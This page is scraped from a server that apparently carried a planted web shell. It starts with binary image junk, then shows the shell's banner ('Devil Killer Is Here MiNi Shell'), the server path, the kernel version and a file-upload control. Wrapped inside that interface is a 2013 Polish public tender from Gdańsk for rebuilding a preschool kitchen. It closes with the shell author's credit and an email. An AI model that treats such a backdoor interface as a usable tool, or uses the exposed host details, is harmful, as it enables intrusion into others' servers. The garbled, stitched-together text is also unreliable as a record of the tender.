JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130313/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20130313/37987-N-2013.html

<p class="kh_header"><b>Gdańsk: Przebudowa węzła żywienia w Przedszkolu Nr 40 w Gdańsku, al. Rzeczypospolitej 11A</b><br>
<b>Numer ogłoszenia: 37987 - 2013; data zamieszczenia: 13.03.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Dyrekcja Rozbudowy Miasta Gdańska działająca w imieniu Gminy Miasta Gdańska , ul. Piekarnicza 16, 80-126 Gdańsk, woj. pomorskie, tel. 058 3205100, faks 058 3205105.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.drmg.gdansk.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa węzła żywienia w Przedszkolu Nr 40 w Gdańsku, al. Rzeczypospolitej 11A.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zakres rzeczowy obejmuje :
       -    roboty budowlane, sanitarne i elektryczne związane z wykonaniem przebudowy 
            pomieszczeń  kuchni i zaplecza kuchennego  o łącznej pow. ok.112,5  m2 , które 
            znajdują się w parterowym budynku Przedszkola
            Celem przebudowy jest  wydzielenie części kuchennej od części ogólnej Przedszkola,
            zapewnienie prawidłowego zaplecza socjalno-sanitarnego dla personelu kuchni, 
            wydzielenie dróg czystych od brudnych , zapewnienie prawidłowej wentylacji 
            mechanicznej i ogrzewania  kuchni oraz poprawa warunków technicznych, 
            higieniczno-sanitarnych i estetycznych   pomieszczeń objętych zamówieniem.
            Roboty należy wykonać zgodnie z projektem wykonawczym, w tym:
            -  zerwanie i ułożenie na nowym podłożu posadzek przeciwpoślizgowych:
               1)  na bazie żywic poliuretanowych lub epoksydowych gr.ok. 2,5 cm ( ok. 91,5 m2), 
                      2)  z gresu  technicznego (ok. 12,30m2) 
               3) z gresu szkliwionego (ok. 8,7  m2), 
                  -  wykonanie nowych otworów drzwiowych z montażem  nadproży stalowych
                 z profili walcowanych C-120 i 260   w ścianach konstrukcyjnych - 4 szt.
             -  wymurowanie nowych ścianek działowych,
             -  wykonanie sufitów podwieszanych i lekkich obudów pinów i kanałów
             -  zainstalowanie komory gospodarczej omurowanej
             -  wymiana stolarki drzwiowej wewnętrznej (szt. 15) i zewnętrznej  (szt.3)
             -  wymiana stolarki okiennej na nową z PCV wraz z  zamontowaniem na wszystkich
                otwieralnych oknach  siatek przeciw owadom ,
             -  udrożnienie istniejących kanałów wentylacyjnych i dymowych
             -  wykonanie i montaż blaszanych kanałów wentylacyjnych,  
             -  wymiana wewnętrznej instalacji wod.-kan., gazu i c.o.,
             -  wymiana instalacji elektrycznej 400 V zasilania urządzeń kuchennych oraz 230 V 
                oświetleniowej
             -  malowanie ścian i sufitów, wyłożenie  ścian glazurą.               
     -    dostawa wraz z montażem wyposażenia technologicznego 
               następująco:
           -  urządzenia  i meble gastronomiczne winny być : fabrycznie nowe, wykonane ze stali 
               nierdzewnej 18/10, spełniające wymagania i parametry techniczne określone w 
              projekcie  technologii
              -  wykonawca winien:  dostarczyć i ustawić meble i urządzenia gastronomiczne
     (zgodnie z ustawieniem przedstawionym na rys. nr  T-1;T-2 projektu technologii)  a urządzenia dodatkowo  podłączyć ,
          -   po podłączeniu urządzeń gastronomicznych wykonawca przekaże użytkownikowi karty gwarancyjne i DTR-ki  tych urządzeń oraz  przeszkoli personel kuchni 
           ( w uzgodnionym  z użytkownikiem terminie) w zakresie ich obsługi..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.08.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> W niniejszym postępowaniu zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony, jeżeli wykonawca wykaże, że w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy- w tym okresie, wykonał co najmniej dwie roboty budowlane w zakresie robót ogólnobudowlanych, z  których każda obejmowała branżę: budowlaną, sanitarną 
i elektryczną o wartości jednostkowej każdej roboty równej lub większej niż 300.000 zł brutto.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony, jeżeli wykonawca dysponuje  lub będzie dysponował w okresie 
           wykonywania zamówienia : 
a)	kierownikiem budowy posiadającym uprawnienia budowlane w specjalności konstrukcyjno-budowlanej, 
             b)   kierownikiem robót sanitarnych posiadającym uprawnienia budowlane w zakresie 
                   instalacji  sanitarnych,
b)	kierownikiem robót elektrycznych posiadającym uprawnienia budowlane w zakresie 
                   instalacji elektrycznych</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony, jeżeli wykonawca posiada w banku lub w spółdzielczej
            kasie oszczędnościowo-kredytowej środki finansowe lub zdolność kredytową 
           w wysokości co najmniej  100.000 zł.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>W celu wykazania spełnienia przez wykonawcę warunków udziału w postępowaniu ,
           o których  mowa w art. 22 ust. 1 ustawy wykonawca (oprócz oświadczenia, o którym mowa w sekcji III.4.1) ogłoszenia) składa wraz z ofertą :
1.1.	 wykaz  robót budowlanych w zakresie robót ogólnobudowlanych o wartości 
       jednostkowej każdej roboty równej lub większej od 300.000 zł  brutto, wykonanych 
        w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli 
       okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju 
       i wartości, daty i miejsca wykonania oraz załącza dowody - poświadczenia dotyczące
       tych robót, lub inne dokumenty - jeżeli z uzasadnionych przyczyn o obiektywnym 
       charakterze wykonawca nie jest w stanie uzyskać poświadczeń, określające czy roboty 
       zostały wykonane w sposób należyty oraz wskazujące, czy zostały wykonane zgodnie 
       z zasadami sztuki budowlanej i prawidłowo ukończone. 
       Uwaga: W przypadku niniejszego postępowania o udzielenie zamówienia 
       podstawowego wykonawca może, zamiast wymienionych wyżej poświadczeń, 
       złożyć dokumenty potwierdzające, że roboty zostały wykonane zgodnie z 
       zasadami sztuki budowlanej prawidłowo ukończone.
       Podstawa prawna: §9 ust. 2 Rozporządzenia Prezesa Rady Ministrów z dnia 
       19.02.2013 r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający 
       od wykonawcy, oraz form, w jakich te dokumenty mogą być składane.
1.2. wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, 
          odpowiedzialnych za kierowanie robotami budowlanymi, w zakresie 
          niezbędnym do wykazania spełnienia warunku, o którym mowa w sekcji III.3.4)
          wraz z oświadczeniem, że osoba wskazana jako kierownik budowy   
         posiada wymagane uprawnienia. 
1.3. informację banku lub spółdzielczej kasy oszczędnościowo- kredytowej, 
          potwierdzającą wysokość posiadanych środków finansowych lub zdolność 
          kredytową wykonawcy w zakresie niezbędnym do wykazania spełnienia 
          warunku, o którym mowa w sekcji III.3.5), wystawioną nie wcześniej niż 3 
         miesiące przed upływem terminu składania ofert
2. Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym,
        osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych  
        podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków.   
        Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie 
        dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności 
         przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do 
         dyspozycji niezbędnych zasobów na okres korzystania z nich  przy wykonywaniu 
         zamówienia.
3.   Jeżeli wykonawca, wykazując spełnianie warunków, o których mowa w art. 22 ust.1 
          pkt 2 i 3 ustawy, polega na zasobach innych podmiotów na zasadach określonych 
          w pkt 2 , Zamawiający, w celu oceny, czy wykonawca będzie dysponował 
          zasobami innych podmiotów w stopniu niezbędnym do należytego wykonania 
           zamówienia oraz oceny, czy stosunek łączący wykonawcę z tymi podmiotami 
          gwarantuje rzeczywisty dostęp do ich zasobów, żąda złożenia dokumentów 
          dotyczących:
         3.1.zakresu dostępnych wykonawcy zasobów innego podmiotu,
         3.2.sposobu wykorzystania zasobów innego podmiotu, przez wykonawcę, 
                  przy wykonywaniu zamówienia,
         3.3.charakteru stosunku, jaki będzie łączył wykonawcę z innym podmiotem,
         3.4.zakresu i okresu udziału innego podmiotu przy wykonywaniu zamówienia.
4. Jeżeli wykonawca, wykazując spełnianie warunku, o których mowa w art. 22 ust.1 
        pkt. 4 ustawy, polega na zasobach finansowych innych podmiotów na zasadach 
        określonych w art. 26 ust. 2b ustawy, zamawiający wymaga przedłożenia informacji, 
        o której mowa w pkt. 1.3.dotyczącej tych podmiotów.             
5. Jeżeli z uzasadnionej przyczyny wykonawca nie może przedstawić dokumentów  
       dotyczących sytuacji finansowej i ekonomicznej wymaganych przez zamawiającego, 
       może przedstawić inny dokument, który w  wystarczający sposób potwierdza 
       spełnienie opisanego  przez zamawiającego warunku.           
6.	W celu wykazania braku podstaw do wykluczenia na podstawie art.24 ust.1 ustawy wykonawca (oprócz oświadczenia, o którym mowa w sekcji III.4.2) składa wraz z ofertą :
6.1 . listę podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy 
        z dnia 16.02.2007 r. o ochronie konkurencji i konsumentów (Dz. U. Nr 50, poz. 
        331, z późn. zm.), a w przypadku wykonawców nie należących do grupy 
        kapitałowej oświadczenie o braku takiej przynależności
6.2.aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji 
         o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru 
         lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 
         24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem 
         terminu składania  ofert.
7.Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium
  Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w pkt 6.2.składa
          dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce 
          zamieszkania, potwierdzające, że nie otwarto jego likwidacji ani nie
          ogłoszono upadłości.
7.1.	Dokumenty, o których mowa w pkt 7.powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 
7.2.	Jeżeli w kraju miejsca zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt 7, zastępuje się je dokumentem zawierającym oświadczenie, w którym określa się także osoby uprawnione do reprezentacji wykonawcy, złożone przed właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, lub przed notariuszem. Zapis pkt 7.1. stosuje się odpowiednio.
8.	   Dokumenty są składane w oryginale lub kopii poświadczonej za zgodność z oryginałem przez wykonawcę.
9.	W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia oraz w przypadku innych podmiotów, na zasobach których wykonawca polega na zasadach określonych w art. 26 ust. 2b ustawy, kopie dokumentów dotyczących odpowiednio wykonawcy lub tych podmiotów są poświadczane za zgodność z oryginałem odpowiednio przez wykonawcę lub te podmioty.
10.	Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski.
11.	W przypadku, gdy wykonawcę reprezentuje pełnomocnik, do oferty należy załączyć   pełnomocnictwo z określeniem jego zakresu. Pełnomocnictwo należy złożyć w oryginale lub kopii poświadczonej notarialnie.
12.  Wykonawcy wspólnie ubiegający się o udzielenie zamówienia:
12.1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia pod warunkiem ustanowienia pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia publicznego. Pełnomocnictwo może również zawierać umocowanie do zawarcia umowy.
12.2	Pełnomocnictwo powinno być udzielone na piśmie i dołączone do oferty w formie oryginału lub odpisu poświadczonego notarialnie.
12.3.	Umocowanie do reprezentowania wykonawców w postępowaniu o udzielenie zamówienia publicznego lub do zawarcia umowy może być zawarte w treści umowy konsorcjum.
12.4.	Jeżeli oferta wykonawców wspólnie ubiegających się o udzielenie zamówienia zostanie wybrana, zamawiający będzie żądać przed zawarciem umowy w sprawie zamówienia publicznego umowy regulującej współpracę tych wykonawców.
12.5.Oświadczenie lub oświadczenia o spełnianiu warunków udziału w postępowaniu winno/y potwierdzać, że wykonawcy wspólnie ubiegający się o udzielenie zamówienia łącznie spełniają warunki udziału w postępowaniu.
12.6.Dokumenty wymienione w pkt 6. muszą być złożone przez każdego z wykonawców wspólnie ubiegających się o udzielenie zamówienia.
12.7.	Dokumenty wymienione w pkt 1. powinny potwierdzać, że wykonawcy wspólnie ubiegający się o udzielenie zamówienia łącznie spełniają warunki udziału w postępowaniu.
13.	W przypadku złożenia przez wykonawców dokumentów, w których jakiekolwiek kwoty podane zostały w walutach obcych, zamawiający przeliczy te kwoty na złote polskie według średniego kursu Narodowego Banku Polskiego obowiązującego w dniu zamieszczenia ogłoszenia o zamówieniu w Biuletynie Zamówień Publicznych.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Zmiana postanowień zawartej umowy może nastąpić w następujących przypadkach:
1.1.Zmian nie dotyczących treści oferty, na podstawie której dokonano wyboru 
           wykonawcy.
1.2. Zmian korzystnych dla zamawiającego, których konieczność wprowadzenia wynika 
            z okoliczności, których nie można było przewidzieć w chwili zawarcia umowy.
1.3. Przesunięcia terminu wykonania przedmiotu umowy, jeżeli z przyczyn od wykonawcy
            niezależnych, których nie można było przewidzieć w chwili zawarcia umowy, nie jest 
            możliwe dotrzymanie terminu wykonania przedmiotu umowy.
1.4. Przesunięcia terminu wykonania przedmiotu umowy ze względu na konieczność  
            udzielenia zamówień dodatkowych niezbędnych dla prawidłowego wykonania 
             przedmiotu umowy, jeżeli nie jest możliwe równoległe wykonywanie robót.
1.5. Dopuszczalnej prawem zmiany stron umowy lub oznaczenia stron umowy.
1.6. Wprowadzenia lub zmiany podwykonawcy lub dalszego podwykonawcy robót.
1.7. Zmiany wynagrodzenia w następstwie zmiany przepisów o podatku od towarów 
             i usług (VAT).
1.8. Zmiany w zakresie przedmiotu zamówienia, jeżeli konieczność wprowadzenia takich 	zmian  jest skutkiem zmiany przepisów prawa.
1.9. Zmian w zakresie zasad rozliczeń i warunków płatności związanych z zawarciem 
            umowy o podwykonawstwo lub dalsze podwykonawstwo.
1.10. Zmiany wynagrodzenia  w przypadku ograniczenia przez zamawiającego 
            zakresu przedmiotu umowy z przyczyn, których nie można było przewidzieć w chwili 
             zawarcia umowy.
2.	 Strona występująca o zmianę postanowień umowy zobowiązana jest do  
         udokumentowania zaistnienia okoliczności, o których mowa w pkt. 1. 
             Wniosek o zmianę postanowień umowy musi być wyrażony na piśmie.
3. Zmiana umowy może nastąpić wyłącznie w formie pisemnego aneksu pod  rygorem
         nieważności.
4. W przypadku ustawowej zmiany stawki podatku VAT należne wykonawcy z tytułu 
          wykonania  przedmiotu umowy wynagrodzenie zostanie ustalone z uwzględnieniem     
          stawki podatku wynikającej z obowiązujących przepisów. Zmiana wysokości 
         wynagrodzenia dotyczyć będzie robót wykonanych po dacie podpisania aneksu</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.drmg.gdansk.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dyrekcja Rozbudowy Miasta Gdańska, 80-126 Gdańsk, ul. Piekarnicza 16, p. Beata Puzdrowska, pok. nr 28, tel 58 320 51 14, opłata: 150,- PLN (gotówka lub za zaliczeniem pocztowym).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.04.2013 godzina 09:00, miejsce: Dyrekcja Rozbudowy Miasta Gdańska, 80-126 Gdańsk, ul. Piekarnicza 16, pok. nr 15 (sekretariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com